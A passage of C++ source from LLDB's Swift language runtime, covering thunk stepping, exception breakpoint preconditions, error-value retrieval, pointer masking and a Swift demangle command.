return new_thread_plan_sp; } size_t num_children = witness_node->getNumChildren(); if (num_children < 2) { if (log) log->Printf("Stepped into witness thunk \"%s\" but the " "ProtocolWitness node doesn't have enough nodes.", symbol_name); return new_thread_plan_sp; } swift::Demangle::NodePointer function_node = witness_node->getChild(1); if (function_node == nullptr || function_node->getKind() != swift::Demangle::Node::Kind::Function) { if (log) log->Printf("Stepped into witness thunk \"%s\" but could not " "find the function in the ProtocolWitness node.", symbol_name); return new_thread_plan_sp; } // Okay, now find the name of this function. num_children = function_node->getNumChildren(); swift::Demangle::NodePointer name_node(nullptr); for (size_t i = 0; i < num_children; i++) { if (function_node->getChild(i)->getKind() == swift::Demangle::Node::Kind::Identifier) { name_node = function_node->getChild(i); break; } } if (!name_node) { if (log) log->Printf("Stepped into witness thunk \"%s\" but could not " "find the Function name in the function node.", symbol_name); return new_thread_plan_sp; } std::string function_name(name_node->getText()); if (function_name.empty()) { if (log) log->Printf("Stepped into witness thunk \"%s\" but the Function " "name was empty.", symbol_name); return new_thread_plan_sp; } // We have to get the address range of the thunk symbol, and make a // "step through range stepping in" AddressRange sym_addr_range(sc.symbol->GetAddress(), sc.symbol->GetByteSize()); new_thread_plan_sp.reset(new ThreadPlanStepInRange( thread, sym_addr_range, sc, function_name.c_str(), eOnlyDuringStepping, eLazyBoolNo, eLazyBoolNo)); return new_thread_plan_sp; } break; case ThunkAction::StepThrough: { if (log) log->Printf("Stepping through thunk: %s kind: %s", symbol_name, GetThunkKindName(thunk_kind)); AddressRange sym_addr_range(sc.symbol->GetAddress(), sc.symbol->GetByteSize()); new_thread_plan_sp.reset(new ThreadPlanStepInRange( thread, sym_addr_range, sc, nullptr, eOnlyDuringStepping, eLazyBoolNo, eLazyBoolNo)); return new_thread_plan_sp; } break; } if (target_address.IsValid()) { new_thread_plan_sp.reset( new ThreadPlanRunToAddress(thread, target_address, stop_others)); } return new_thread_plan_sp; } void SwiftLanguageRuntime::FindFunctionPointersInCall( StackFrame &frame, std::vector<Address> &addresses, bool debug_only, bool resolve_thunks) { // Extract the mangled name from the stack frame, and realize the function // type in the Target's SwiftASTContext. // Then walk the arguments looking for function pointers. If we find one in // the FIRST argument, we can fetch // the pointer value and return that. // FIXME: when we can ask swift/llvm for the location of function arguments, // then we can do this for all the // function pointer arguments we find. SymbolContext sc = frame.GetSymbolContext(eSymbolContextSymbol); if (sc.symbol) { Mangled mangled_name = sc.symbol->GetMangled(); if (mangled_name.GuessLanguage() == lldb::eLanguageTypeSwift) { Status error; Target &target = frame.GetThread()->GetProcess()->GetTarget(); ExecutionContext exe_ctx(frame); auto swift_ast = target.GetScratchSwiftASTContext(error, frame); if (swift_ast) { CompilerType function_type = swift_ast->GetTypeFromMangledTypename( mangled_name.GetMangledName(), error); if (error.Success()) { if (function_type.IsFunctionType()) { // FIXME: For now we only check the first argument since we don't // know how to find the values // of arguments further in the argument list. // int num_arguments = function_type.GetFunctionArgumentCount(); // for (int i = 0; i < num_arguments; i++) for (int i = 0; i < 1; i++) { CompilerType argument_type = function_type.GetFunctionArgumentTypeAtIndex(i); if (argument_type.IsFunctionPointerType()) { // We found a function pointer argument. Try to track down its // value. This is a hack // for now, we really should ask swift/llvm how to find the // argument(s) given the // Swift decl for this function, and then look those up in the // frame. ABISP abi_sp(frame.GetThread()->GetProcess()->GetABI()); ValueList argument_values; Value input_value; CompilerType clang_void_ptr_type = target.GetScratchClangASTContext() ->GetBasicType(eBasicTypeVoid) .GetPointerType(); input_value.SetValueType(Value::eValueTypeScalar); input_value.SetCompilerType(clang_void_ptr_type); argument_values.PushValue(input_value); bool success = abi_sp->GetArgumentValues( *(frame.GetThread().get()), argument_values); if (success) { // Now get a pointer value from the zeroth argument. Status error; DataExtractor data; ExecutionContext exe_ctx; frame.CalculateExecutionContext(exe_ctx); error = argument_values.GetValueAtIndex(0)->GetValueAsData( &exe_ctx, data, 0, NULL); lldb::offset_t offset = 0; lldb::addr_t fn_ptr_addr = data.GetPointer(&offset); Address fn_ptr_address; fn_ptr_address.SetLoadAddress(fn_ptr_addr, &target); // Now check to see if this has debug info: bool add_it = true; if (resolve_thunks) { SymbolContext sc; fn_ptr_address.CalculateSymbolContext( &sc, eSymbolContextEverything); if (sc.comp_unit && sc.symbol) { ConstString symbol_name = sc.symbol->GetMangled().GetMangledName(); if (symbol_name) { SymbolContext target_context; if (GetTargetOfPartialApply(sc, symbol_name, target_context)) { if (target_context.symbol) fn_ptr_address = target_context.symbol->GetAddress(); else if (target_context.function) fn_ptr_address = target_context.function->GetAddressRange() .GetBaseAddress(); } } } } if (debug_only) { LineEntry line_entry; fn_ptr_address.CalculateSymbolContextLineEntry(line_entry); if (!line_entry.IsValid()) add_it = false; } if (add_it) addresses.push_back(fn_ptr_address); } } } } } } } } } //------------------------------------------------------------------ // Exception breakpoint Precondition class for Swift: //------------------------------------------------------------------ void SwiftLanguageRuntime::SwiftExceptionPrecondition::AddTypeName( const char *class_name) { m_type_names.insert(class_name); } void SwiftLanguageRuntime::SwiftExceptionPrecondition::AddEnumSpec( const char *enum_name, const char *element_name) { std::unordered_map<std::string, std::vector<std::string>>::value_type new_value(enum_name, std::vector<std::string>()); auto result = m_enum_spec.emplace(new_value); result.first->second.push_back(element_name); } SwiftLanguageRuntime::SwiftExceptionPrecondition::SwiftExceptionPrecondition() { } ValueObjectSP SwiftLanguageRuntime::CalculateErrorValueObjectFromValue( Value &value, ConstString name, bool persistent) { ValueObjectSP error_valobj_sp; Status error; SwiftASTContext *ast_context = llvm::dyn_cast_or_null<SwiftASTContext>( m_process->GetTarget().GetScratchTypeSystemForLanguage( &error, eLanguageTypeSwift)); if (!ast_context || error.Fail()) return error_valobj_sp; CompilerType swift_error_proto_type = ast_context->GetErrorType(); value.SetCompilerType(swift_error_proto_type); error_valobj_sp = ValueObjectConstResult::Create( m_process, value, name); if (error_valobj_sp && error_valobj_sp->GetError().Success()) { error_valobj_sp = error_valobj_sp->GetQualifiedRepresentationIfAvailable( lldb::eDynamicCanRunTarget, true); if (!IsValidErrorValue(*(error_valobj_sp.get()))) { error_valobj_sp.reset(); } } if (persistent && error_valobj_sp) { ExecutionContext ctx = error_valobj_sp->GetExecutionContextRef().Lock(false); auto *exe_scope = ctx.GetBestExecutionContextScope(); if (!exe_scope) return error_valobj_sp; Target &target = m_process->GetTarget(); auto *persistent_state = target.GetSwiftPersistentExpressionState(*exe_scope); const bool is_error = true; auto prefix = persistent_state->GetPersistentVariablePrefix(is_error); ConstString persistent_variable_name( persistent_state->GetNextPersistentVariableName(target, prefix)); lldb::ValueObjectSP const_valobj_sp; // Check in case our value is already a constant value if (error_valobj_sp->GetIsConstant()) { const_valobj_sp = error_valobj_sp; const_valobj_sp->SetName(persistent_variable_name); } else const_valobj_sp = error_valobj_sp->CreateConstantValue(persistent_variable_name); lldb::ValueObjectSP live_valobj_sp = error_valobj_sp; error_valobj_sp = const_valobj_sp; ExpressionVariableSP clang_expr_variable_sp( persistent_state->CreatePersistentVariable(error_valobj_sp)); clang_expr_variable_sp->m_live_sp = live_valobj_sp; clang_expr_variable_sp->m_flags |= ClangExpressionVariable::EVIsProgramReference; error_valobj_sp = clang_expr_variable_sp->GetValueObject(); } return error_valobj_sp; } ValueObjectSP SwiftLanguageRuntime::CalculateErrorValue(StackFrameSP frame_sp, ConstString variable_name) { ProcessSP process_sp(frame_sp->GetThread()->GetProcess()); Status error; Target *target = frame_sp->CalculateTarget().get(); ValueObjectSP error_valobj_sp; auto *runtime = Get(*process_sp); if (!runtime) return error_valobj_sp; llvm::Optional<Value> arg0 = runtime->GetErrorReturnLocationAfterReturn(frame_sp); if (!arg0) return error_valobj_sp; ExecutionContext exe_ctx; frame_sp->CalculateExecutionContext(exe_ctx); auto *exe_scope = exe_ctx.GetBestExecutionContextScope(); if (!exe_scope) return error_valobj_sp; auto ast_context = target->GetScratchSwiftASTContext(error, *frame_sp); if (!ast_context || error.Fail()) return error_valobj_sp; lldb::DataBufferSP buffer(new lldb_private::DataBufferHeap( arg0->GetScalar().GetBytes(), arg0->GetScalar().GetByteSize())); CompilerType swift_error_proto_type = ast_context->GetErrorType(); if (!swift_error_proto_type.IsValid()) return error_valobj_sp; error_valobj_sp = ValueObjectConstResult::Create( exe_scope, swift_error_proto_type, variable_name, buffer, endian::InlHostByteOrder(), exe_ctx.GetAddressByteSize()); if (error_valobj_sp->GetError().Fail()) return error_valobj_sp; error_valobj_sp = error_valobj_sp->GetQualifiedRepresentationIfAvailable( lldb::eDynamicCanRunTarget, true); return error_valobj_sp; } void SwiftLanguageRuntime::RegisterGlobalError(Target &target, ConstString name, lldb::addr_t addr) { Status ast_context_error; SwiftASTContext *ast_context = llvm::dyn_cast_or_null<SwiftASTContext>( target.GetScratchTypeSystemForLanguage(&ast_context_error, eLanguageTypeSwift)); if (ast_context_error.Success() && ast_context && !ast_context->HasFatalErrors()) { SwiftPersistentExpressionState *persistent_state = llvm::cast<SwiftPersistentExpressionState>( target.GetPersistentExpressionStateForLanguage( lldb::eLanguageTypeSwift)); std::string module_name = "$__lldb_module_for_"; module_name.append(&name.GetCString()[1]); SourceModule module_info; module_info.path.push_back(ConstString(module_name)); Status module_creation_error; swift::ModuleDecl *module_decl = ast_context->CreateModule(module_info, module_creation_error); if (module_creation_error.Success() && module_decl) { const bool is_static = false; const auto introducer = swift::VarDecl::Introducer::Let; const bool is_capture_list = false; swift::VarDecl *var_decl = new (*ast_context->GetASTContext()) swift::VarDecl(is_static, introducer, is_capture_list, swift::SourceLoc(), ast_context->GetIdentifier(name.GetCString()), module_decl); var_decl->setType(GetSwiftType(ast_context->GetErrorType())); var_decl->setInterfaceType(var_decl->getType()); var_decl->setDebuggerVar(true); persistent_state->RegisterSwiftPersistentDecl(var_decl); ConstString mangled_name; { swift::Mangle::ASTMangler mangler(true); mangled_name = ConstString(mangler.mangleGlobalVariableFull(var_decl)); } lldb::addr_t symbol_addr; { ProcessSP process_sp(target.GetProcessSP()); Status alloc_error; symbol_addr = process_sp->AllocateMemory( process_sp->GetAddressByteSize(), lldb::ePermissionsWritable | lldb::ePermissionsReadable, alloc_error); if (alloc_error.Success() && symbol_addr != LLDB_INVALID_ADDRESS) { Status write_error; process_sp->WritePointerToMemory(symbol_addr, addr, write_error); if (write_error.Success()) { persistent_state->RegisterSymbol(mangled_name, symbol_addr); } } } } } } lldb::BreakpointPreconditionSP SwiftLanguageRuntime::GetBreakpointExceptionPrecondition(LanguageType language, bool throw_bp) { if (language != eLanguageTypeSwift) return lldb::BreakpointPreconditionSP(); if (!throw_bp) return lldb::BreakpointPreconditionSP(); BreakpointPreconditionSP precondition_sp( new SwiftLanguageRuntime::SwiftExceptionPrecondition()); return precondition_sp; } bool SwiftLanguageRuntime::SwiftExceptionPrecondition::EvaluatePrecondition( StoppointCallbackContext &context) { if (!m_type_names.empty()) { StackFrameSP frame_sp = context.exe_ctx_ref.GetFrameSP(); if (!frame_sp) return true; ValueObjectSP error_valobj_sp = CalculateErrorValue(frame_sp, ConstString("__swift_error_var")); if (!error_valobj_sp || error_valobj_sp->GetError().Fail()) return true; // This shouldn't fail, since at worst it will return me the object I just // successfully got. std::string full_error_name( error_valobj_sp->GetCompilerType().GetTypeName().AsCString()); size_t last_dot_pos = full_error_name.rfind('.'); std::string type_name_base; if (last_dot_pos == std::string::npos) type_name_base = full_error_name; else { if (last_dot_pos + 1 <= full_error_name.size()) type_name_base = full_error_name.substr(last_dot_pos + 1, full_error_name.size()); } // The type name will be the module and then the type. If the match name // has a dot, we require a complete // match against the type, if the type name has no dot, we match it against // the base. for (std::string name : m_type_names) { if (name.rfind('.') != std::string::npos) { if (name == full_error_name) return true; } else { if (name == type_name_base) return true; } } return false; } return true; } void SwiftLanguageRuntime::SwiftExceptionPrecondition::GetDescription( Stream &stream, lldb::DescriptionLevel level) { if (level == eDescriptionLevelFull || level == eDescriptionLevelVerbose) { if (m_type_names.size() > 0) { stream.Printf("\nType Filters:"); for (std::string name : m_type_names) { stream.Printf(" %s", name.c_str()); } stream.Printf("\n"); } } } Status SwiftLanguageRuntime::SwiftExceptionPrecondition::ConfigurePrecondition( Args &args) { Status error; std::vector<std::string> object_typenames; args.GetOptionValuesAsStrings("exception-typename", object_typenames); for (auto type_name : object_typenames) AddTypeName(type_name.c_str()); return error; } void SwiftLanguageRuntime::AddToLibraryNegativeCache(StringRef library_name) { std::lock_guard<std::mutex> locker(m_negative_cache_mutex); m_library_negative_cache.insert(library_name); } bool SwiftLanguageRuntime::IsInLibraryNegativeCache(StringRef library_name) { std::lock_guard<std::mutex> locker(m_negative_cache_mutex); return m_library_negative_cache.count(library_name) == 1; } lldb::addr_t SwiftLanguageRuntime::MaskMaybeBridgedPointer(lldb::addr_t addr, lldb::addr_t *masked_bits) { if (!m_process) return addr; const ArchSpec &arch_spec(m_process->GetTarget().GetArchitecture()); ArchSpec::Core core_kind = arch_spec.GetCore(); bool is_arm = false; bool is_intel = false; bool is_s390x = false; bool is_32 = false; bool is_64 = false; if (core_kind == ArchSpec::Core::eCore_arm_arm64) { is_arm = is_64 = true; } else if (core_kind >= ArchSpec::Core::kCore_arm_first && core_kind <= ArchSpec::Core::kCore_arm_last) { is_arm = true; } else if (core_kind >= ArchSpec::Core::kCore_x86_64_first && core_kind <= ArchSpec::Core::kCore_x86_64_last) { is_intel = true; } else if (core_kind >= ArchSpec::Core::kCore_x86_32_first && core_kind <= ArchSpec::Core::kCore_x86_32_last) { is_intel = true; } else if (core_kind == ArchSpec::Core::eCore_s390x_generic) { is_s390x = true; } else { // this is a really random CPU core to be running on - just get out fast return addr; } switch (arch_spec.GetAddressByteSize()) { case 4: is_32 = true; break; case 8: is_64 = true; break; default: // this is a really random pointer size to be running on - just get out fast return addr; } lldb::addr_t mask = 0; if (is_arm && is_64) mask = SWIFT_ABI_ARM64_SWIFT_SPARE_BITS_MASK; if (is_arm && is_32) mask = SWIFT_ABI_ARM_SWIFT_SPARE_BITS_MASK; if (is_intel && is_64) mask = SWIFT_ABI_X86_64_SWIFT_SPARE_BITS_MASK; if (is_intel && is_32) mask = SWIFT_ABI_I386_SWIFT_SPARE_BITS_MASK; if (is_s390x && is_64) mask = SWIFT_ABI_S390X_SWIFT_SPARE_BITS_MASK; if (masked_bits) *masked_bits = addr & mask; return addr & ~mask; } lldb::addr_t SwiftLanguageRuntime::MaybeMaskNonTrivialReferencePointer( lldb::addr_t addr, SwiftASTContext::NonTriviallyManagedReferenceStrategy strategy) { if (addr == 0) return addr; AppleObjCRuntime *objc_runtime = GetObjCRuntime(); if (objc_runtime) { // tagged pointers don't perform any masking if (objc_runtime->IsTaggedPointer(addr)) return addr; } if (!m_process) return addr; const ArchSpec &arch_spec(m_process->GetTarget().GetArchitecture()); ArchSpec::Core core_kind = arch_spec.GetCore(); bool is_arm = false; bool is_intel = false; bool is_32 = false; bool is_64 = false; if (core_kind == ArchSpec::Core::eCore_arm_arm64) { is_arm = is_64 = true; } else if (core_kind >= ArchSpec::Core::kCore_arm_first && core_kind <= ArchSpec::Core::kCore_arm_last) { is_arm = true; } else if (core_kind >= ArchSpec::Core::kCore_x86_64_first && core_kind <= ArchSpec::Core::kCore_x86_64_last) { is_intel = true; } else if (core_kind >= ArchSpec::Core::kCore_x86_32_first && core_kind <= ArchSpec::Core::kCore_x86_32_last) { is_intel = true; } else { // this is a really random CPU core to be running on - just get out fast return addr; } switch (arch_spec.GetAddressByteSize()) { case 4: is_32 = true; break; case 8: is_64 = true; break; default: // this is a really random pointer size to be running on - just get out fast return addr; } lldb::addr_t mask = 0; if (strategy == SwiftASTContext::NonTriviallyManagedReferenceStrategy::eWeak) { bool is_indirect = true; // On non-objc platforms, the weak reference pointer always pointed to a // runtime structure. // For ObjC platforms, the masked value determines whether it is indirect. uint32_t value = 0; if (objc_runtime) { if (is_intel) { if (is_64) { mask = SWIFT_ABI_X86_64_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_X86_64_OBJC_WEAK_REFERENCE_MARKER_VALUE; } else { mask = SWIFT_ABI_I386_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_I386_OBJC_WEAK_REFERENCE_MARKER_VALUE; } } else if (is_arm) { if (is_64) { mask = SWIFT_ABI_ARM64_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_ARM64_OBJC_WEAK_REFERENCE_MARKER_VALUE; } else { mask = SWIFT_ABI_ARM_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_ARM_OBJC_WEAK_REFERENCE_MARKER_VALUE; } } } else { // This name is a little confusing. The "DEFAULT" marking in System.h // is supposed to mean: the value for non-ObjC platforms. So // DEFAULT_OBJC here actually means "non-ObjC". mask = SWIFT_ABI_DEFAULT_OBJC_WEAK_REFERENCE_MARKER_MASK; value = SWIFT_ABI_DEFAULT_OBJC_WEAK_REFERENCE_MARKER_VALUE; } is_indirect = ((addr & mask) == value); if (!is_indirect) return addr; // The masked value of address is a pointer to the runtime structure. // The first field of the structure is the actual pointer. Process *process = GetProcess(); Status error; lldb::addr_t masked_addr = addr & ~mask; lldb::addr_t isa_addr = process->ReadPointerFromMemory(masked_addr, error); if (error.Fail()) { // FIXME: do some logging here. return addr; } return isa_addr; } else { if (is_arm && is_64) mask = SWIFT_ABI_ARM64_OBJC_NUM_RESERVED_LOW_BITS; else if (is_intel && is_64) mask = SWIFT_ABI_X86_64_OBJC_NUM_RESERVED_LOW_BITS; else mask = SWIFT_ABI_DEFAULT_OBJC_NUM_RESERVED_LOW_BITS; mask = (1 << mask) | (1 << (mask + 1)); return addr & ~mask; } return addr; } ConstString SwiftLanguageRuntime::GetErrorBackstopName() { return ConstString("swift_errorInMain"); } ConstString SwiftLanguageRuntime::GetStandardLibraryBaseName() { static ConstString g_swiftCore("swiftCore"); return g_swiftCore; } ConstString SwiftLanguageRuntime::GetStandardLibraryName() { PlatformSP platform_sp(m_process->GetTarget().GetPlatform()); if (platform_sp) return platform_sp->GetFullNameForDylib(GetStandardLibraryBaseName()); return GetStandardLibraryBaseName(); } class ProjectionSyntheticChildren : public SyntheticChildren { public: struct FieldProjection { ConstString name; CompilerType type; int32_t byte_offset; FieldProjection(CompilerType parent_type, ExecutionContext *exe_ctx, size_t idx) { const bool transparent_pointers = false; const bool omit_empty_base_classes = true; const bool ignore_array_bounds = false; bool child_is_base_class = false; bool child_is_deref_of_parent = false; std::string child_name; uint32_t child_byte_size; uint32_t child_bitfield_bit_size; uint32_t child_bitfield_bit_offset; uint64_t language_flags; type = parent_type.GetChildCompilerTypeAtIndex( exe_ctx, idx, transparent_pointers, omit_empty_base_classes, ignore_array_bounds, child_name, child_byte_size, byte_offset, child_bitfield_bit_size, child_bitfield_bit_offset, child_is_base_class, child_is_deref_of_parent, nullptr, language_flags); if (child_is_base_class) type.Clear(); // invalidate - base classes are dealt with outside of the // projection else name.SetCStringWithLength(child_name.c_str(), child_name.size()); } bool IsValid() { return !name.IsEmpty() && type.IsValid(); } explicit operator bool() { return IsValid(); } }; struct TypeProjection { std::vector<FieldProjection> field_projections; ConstString type_name; }; typedef std::unique_ptr<TypeProjection> TypeProjectionUP; bool IsScripted() { return false; } std::string GetDescription() { return "projection synthetic children"; } ProjectionSyntheticChildren(const Flags &flags, TypeProjectionUP &&projection) : SyntheticChildren(flags), m_projection(std::move(projection)) {} protected: TypeProjectionUP m_projection; class ProjectionFrontEndProvider : public SyntheticChildrenFrontEnd { public: ProjectionFrontEndProvider(ValueObject &backend, TypeProjectionUP &projection) : SyntheticChildrenFrontEnd(backend), m_num_bases(0), m_projection(projection.get()) { lldbassert(m_projection && "need a valid projection"); CompilerType type(backend.GetCompilerType()); m_num_bases = type.GetNumDirectBaseClasses(); } size_t CalculateNumChildren() override { return m_projection->field_projections.size() + m_num_bases; } lldb::ValueObjectSP GetChildAtIndex(size_t idx) override { if (idx < m_num_bases) { if (ValueObjectSP base_object_sp = m_backend.GetChildAtIndex(idx, true)) { CompilerType base_type(base_object_sp->GetCompilerType()); ConstString base_type_name(base_type.GetTypeName()); if (base_type_name.IsEmpty() || !SwiftLanguageRuntime::IsSwiftClassName( base_type_name.GetCString())) return base_object_sp; base_object_sp = m_backend.GetSyntheticBase( 0, base_type, true, Mangled(base_type_name, true) .GetDemangledName(lldb::eLanguageTypeSwift)); return base_object_sp; } else return nullptr; } idx -= m_num_bases; if (idx < m_projection->field_projections.size()) { auto &projection(m_projection->field_projections.at(idx)); return m_backend.GetSyntheticChildAtOffset( projection.byte_offset, projection.type, true, projection.name); } return nullptr; } size_t GetIndexOfChildWithName(ConstString name) override { for (size_t idx = 0; idx < m_projection->field_projections.size(); idx++) { if (m_projection->field_projections.at(idx).name == name) return idx; } return UINT32_MAX; } bool Update() override { return false; } bool MightHaveChildren() override { return true; } ConstString GetSyntheticTypeName() override { return m_projection->type_name; } private: size_t m_num_bases; TypeProjectionUP::element_type *m_projection; }; public: SyntheticChildrenFrontEnd::AutoPointer GetFrontEnd(ValueObject &backend) { return SyntheticChildrenFrontEnd::AutoPointer( new ProjectionFrontEndProvider(backend, m_projection)); } }; lldb::SyntheticChildrenSP SwiftLanguageRuntime::GetBridgedSyntheticChildProvider(ValueObject &valobj) { ConstString type_name = valobj.GetCompilerType().GetTypeName(); if (!type_name.IsEmpty()) { auto iter = m_bridged_synthetics_map.find(type_name.AsCString()), end = m_bridged_synthetics_map.end(); if (iter != end) return iter->second; } ProjectionSyntheticChildren::TypeProjectionUP type_projection( new ProjectionSyntheticChildren::TypeProjectionUP::element_type()); if (auto swift_ast_ctx = valobj.GetScratchSwiftASTContext()) { Status error; CompilerType swift_type = swift_ast_ctx->GetTypeFromMangledTypename(type_name, error); if (swift_type.IsValid()) { ExecutionContext exe_ctx(GetProcess()); bool any_projected = false; for (size_t idx = 0, e = swift_type.GetNumChildren(true, &exe_ctx); idx < e; idx++) { // if a projection fails, keep going - we have offsets here, so it // should be OK to skip some members if (auto projection = ProjectionSyntheticChildren::FieldProjection( swift_type, &exe_ctx, idx)) { any_projected = true; type_projection->field_projections.push_back(projection); } } if (any_projected) { type_projection->type_name = swift_type.GetDisplayTypeName(); SyntheticChildrenSP synth_sp = SyntheticChildrenSP(new ProjectionSyntheticChildren( SyntheticChildren::Flags(), std::move(type_projection))); m_bridged_synthetics_map.insert({type_name.AsCString(), synth_sp}); return synth_sp; } } } return nullptr; } void SwiftLanguageRuntime::WillStartExecutingUserExpression( bool runs_in_playground_or_repl) { std::lock_guard<std::mutex> lock(m_active_user_expr_mutex); Log *log(GetLogIfAnyCategoriesSet(LIBLLDB_LOG_EXPRESSIONS)); if (m_active_user_expr_count == 0 && m_dynamic_exclusivity_flag_addr && !runs_in_playground_or_repl) { // We're executing the first user expression. Toggle the flag. Status error; TypeSystem *type_system = m_process->GetTarget().GetScratchTypeSystemForLanguage( &error, eLanguageTypeC_plus_plus); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to get pointer to type " "system: %s", error.AsCString()); return; } ConstString BoolName("bool"); llvm::Optional<uint64_t> bool_size = type_system->GetBuiltinTypeByName(BoolName).GetByteSize(nullptr); if (!bool_size) return; Scalar original_value; m_process->ReadScalarIntegerFromMemory(*m_dynamic_exclusivity_flag_addr, *bool_size, false, original_value, error); m_original_dynamic_exclusivity_flag_state = original_value.UInt() != 0; if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to read " "disableExclusivityChecking flag state: %s", error.AsCString()); } else { Scalar new_value(1U); m_process->WriteScalarToMemory(*m_dynamic_exclusivity_flag_addr, new_value, *bool_size, error); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to set " "disableExclusivityChecking flag state: %s", error.AsCString()); } else { if (log) log->Printf("SwiftLanguageRuntime: Changed " "disableExclusivityChecking flag state from %u to 1", m_original_dynamic_exclusivity_flag_state); } } } ++m_active_user_expr_count; if (log) log->Printf("SwiftLanguageRuntime: starting user expression. " "Number active: %u", m_active_user_expr_count); } void SwiftLanguageRuntime::DidFinishExecutingUserExpression( bool runs_in_playground_or_repl) { std::lock_guard<std::mutex> lock(m_active_user_expr_mutex); Log *log(GetLogIfAnyCategoriesSet(LIBLLDB_LOG_EXPRESSIONS)); --m_active_user_expr_count; if (log) log->Printf("SwiftLanguageRuntime: finished user expression. " "Number active: %u", m_active_user_expr_count); if (m_active_user_expr_count == 0 && m_dynamic_exclusivity_flag_addr && !runs_in_playground_or_repl) { Status error; TypeSystem *type_system = m_process->GetTarget().GetScratchTypeSystemForLanguage( &error, eLanguageTypeC_plus_plus); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to get pointer to type " "system: %s", error.AsCString()); return; } ConstString BoolName("bool"); llvm::Optional<uint64_t> bool_size = type_system->GetBuiltinTypeByName(BoolName).GetByteSize(nullptr); if (!bool_size) return; Scalar original_value(m_original_dynamic_exclusivity_flag_state ? 1U : 0U); m_process->WriteScalarToMemory(*m_dynamic_exclusivity_flag_addr, original_value, *bool_size, error); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to reset " "disableExclusivityChecking flag state: %s", error.AsCString()); } else { if (log) log->Printf("SwiftLanguageRuntime: Changed " "disableExclusivityChecking flag state back to %u", m_original_dynamic_exclusivity_flag_state); } } } llvm::Optional<Value> SwiftLanguageRuntime::GetErrorReturnLocationAfterReturn( lldb::StackFrameSP frame_sp) { llvm::Optional<Value> error_val; llvm::StringRef error_reg_name; ArchSpec arch_spec(GetTargetRef().GetArchitecture()); switch (arch_spec.GetMachine()) { case llvm::Triple::ArchType::arm: error_reg_name = "r6"; break; case llvm::Triple::ArchType::aarch64: error_reg_name = "x21"; break; case llvm::Triple::ArchType::x86_64: error_reg_name = "r12"; break; default: break; } if (error_reg_name.empty()) return error_val; RegisterContextSP reg_ctx = frame_sp->GetRegisterContext(); const RegisterInfo *reg_info = reg_ctx->GetRegisterInfoByName(error_reg_name); lldbassert(reg_info && "didn't get the right register name for swift error register"); if (!reg_info) return error_val; RegisterValue reg_value; if (!reg_ctx->ReadRegister(reg_info, reg_value)) { // Do some logging here. return error_val; } lldb::addr_t error_addr = reg_value.GetAsUInt64(); if (error_addr == 0) return error_val; Value val; if (reg_value.GetScalarValue(val.GetScalar())) { val.SetValueType(Value::eValueTypeScalar); val.SetContext(Value::eContextTypeRegisterInfo, const_cast<RegisterInfo *>(reg_info)); error_val = val; } return error_val; } llvm::Optional<Value> SwiftLanguageRuntime::GetErrorReturnLocationBeforeReturn( lldb::StackFrameSP frame_sp, bool &need_to_check_after_return) { llvm::Optional<Value> error_val; if (!frame_sp) { need_to_check_after_return = false; return error_val; } // For Architectures where the error isn't returned in a register, // there's a magic variable that points to the value. Check that first: ConstString error_location_name("$error"); VariableListSP variables_sp = frame_sp->GetInScopeVariableList(false); VariableSP error_loc_var_sp = variables_sp->FindVariable( error_location_name, eValueTypeVariableArgument); if (error_loc_var_sp) { need_to_check_after_return = false; ValueObjectSP error_loc_val_sp = frame_sp->GetValueObjectForFrameVariable( error_loc_var_sp, eNoDynamicValues); if (error_loc_val_sp && error_loc_val_sp->GetError().Success()) error_val = error_loc_val_sp->GetValue(); return error_val; } // Otherwise, see if we know which register it lives in from the calling convention. // This should probably go in the ABI plugin not here, but the Swift ABI can change with // swiftlang versions and that would make it awkward in the ABI. Function *func = frame_sp->GetSymbolContext(eSymbolContextFunction).function; if (!func) { need_to_check_after_return = false; return error_val; } need_to_check_after_return = func->CanThrow(); return error_val; } //------------------------------------------------------------------ // Static Functions //------------------------------------------------------------------ LanguageRuntime * SwiftLanguageRuntime::CreateInstance(Process *process, lldb::LanguageType language) { if (language == eLanguageTypeSwift) return new SwiftLanguageRuntime(process); else return NULL; } lldb::BreakpointResolverSP SwiftLanguageRuntime::CreateExceptionResolver(Breakpoint *bkpt, bool catch_bp, bool throw_bp) { BreakpointResolverSP resolver_sp; if (throw_bp) resolver_sp.reset(new BreakpointResolverName( bkpt, "swift_willThrow", eFunctionNameTypeBase, eLanguageTypeUnknown, Breakpoint::Exact, 0, eLazyBoolNo)); // FIXME: We don't do catch breakpoints for ObjC yet. // Should there be some way for the runtime to specify what it can do in this // regard? return resolver_sp; } static const char * SwiftDemangleNodeKindToCString(const swift::Demangle::Node::Kind node_kind) { #define NODE(e) \ case swift::Demangle::Node::Kind::e: \ return #e; switch (node_kind) { #include "swift/Demangling/DemangleNodes.def" } return "swift::Demangle::Node::Kind::???"; #undef NODE } static OptionDefinition g_swift_demangle_options[] = { // clang-format off {LLDB_OPT_SET_1, false, "expand", 'e', OptionParser::eNoArgument, nullptr, {}, 0, eArgTypeNone, "Whether LLDB should print the demangled tree"}, // clang-format on }; class CommandObjectSwift_Demangle : public CommandObjectParsed { public: CommandObjectSwift_Demangle(CommandInterpreter &interpreter) : CommandObjectParsed(interpreter, "demangle", "Demangle a Swift mangled name", "language swift demangle"), m_options() {} ~CommandObjectSwift_Demangle() {} virtual Options *GetOptions() { return &m_options; } class CommandOptions : public Options { public: CommandOptions() : Options(), m_expand(false, false) { OptionParsingStarting(nullptr); } virtual ~CommandOptions() {} Status SetOptionValue(uint32_t option_idx, llvm::StringRef option_arg, ExecutionContext *execution_context) override { Status error; const int short_option = m_getopt_table[option_idx].val; switch (short_option) { case 'e': m_expand.SetCurrentValue(true); break; default: error.SetErrorStringWithFormat("invalid short option character '%c'", short_option); break; } return error; } void OptionParsingStarting(ExecutionContext *execution_context) override { m_expand.Clear(); } llvm::ArrayRef<OptionDefinition> GetDefinitions() override { return llvm::makeArrayRef(g_swift_demangle_options); } // Options table: Required for subclasses of Options. OptionValueBoolean m_expand; }; protected: void PrintNode(swift::Demangle::NodePointer node_ptr, Stream &stream, int depth = 0) { if 